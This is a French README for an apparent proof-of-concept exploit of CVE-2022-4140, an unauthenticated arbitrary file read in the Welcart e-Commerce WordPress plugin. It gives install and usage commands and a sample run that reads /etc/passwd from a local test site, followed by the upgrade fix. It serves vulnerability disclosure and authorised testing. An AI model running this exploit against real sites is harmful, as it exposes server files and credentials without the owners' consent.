
WordPress plugin Welcart e-Commerce < 2.8.5 - Lecture arbitraire de fichiers
Ce dépôt contient une preuve de concept (PoC) pour l'exploitation de la CVE-2022-4140.
Ce projet est fourni à des fins éducatives et pour des tests de sécurité autorisés uniquement. Ne l'utilisez pas contre des systèmes que vous ne possédez pas ou pour lesquels vous n'avez pas la permission de tester.
Le plugin ne valide pas la saisie utilisateur avant de l'utiliser pour afficher le contenu d'un fichier, ce qui pourrait permettre à un attaquant non authentifié de lire des fichiers arbitraires sur le serveur.
| Composant | Version |
|---|
| Plugin vulnérable | <=2.8.4 |
| Plugin corrigé | 2.8.5 |
git clone https://github.com/anirbala98/CVE-2022-4140.git
cd CVE-2022-4140/
pip install -r requirements.txt
python exploit.py <base_url> -f <emplacement_du_fichier> --disable-version-check
python exploit.py http://127.0.0.1/wordpress/ -f /etc/passwd
└─$ python exploit.py http://127.0.0.1/wordpress/ -f /etc/passwd
[*] Vérification si la cible est vulnérable
[+] Version du plugin détectée : 2.8.4
[+] La cible est vulnérable
[*] Tentative de lecture d'un fichier arbitraire
root:x:0:0:root:/root:/usr/bin/zsh
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
Mettez à niveau le plugin vers la version 2.8.5.